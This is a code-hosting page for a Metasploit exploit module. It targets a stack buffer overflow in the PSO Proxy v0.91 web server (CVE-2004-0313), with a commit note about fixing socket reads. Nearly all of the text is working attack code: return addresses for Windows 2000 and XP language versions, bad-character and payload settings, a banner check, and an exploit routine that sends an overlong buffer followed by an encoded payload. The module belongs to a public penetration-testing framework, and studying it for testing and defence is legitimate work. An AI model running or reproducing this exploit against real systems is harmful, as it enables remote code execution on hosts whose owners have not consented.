adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4bd14ed5eae1961ba43f790bbc92c99c19b2c10e
metasploit-gs/modules/exploits/windows/http/psoproxy91_overflow.rb
T
HD Moore 6e80481384 Fix bad use of sock.get() and check() implementations 
Many of these modules uses sock.get() when they meant get_once()
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
2014-06-28 16:05:05 -05:00

81 lines
2.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'EDB', '156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 370,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004'
))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get_once
if (banner.to_s =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end
Reference in New Issue View Git Blame Copy Permalink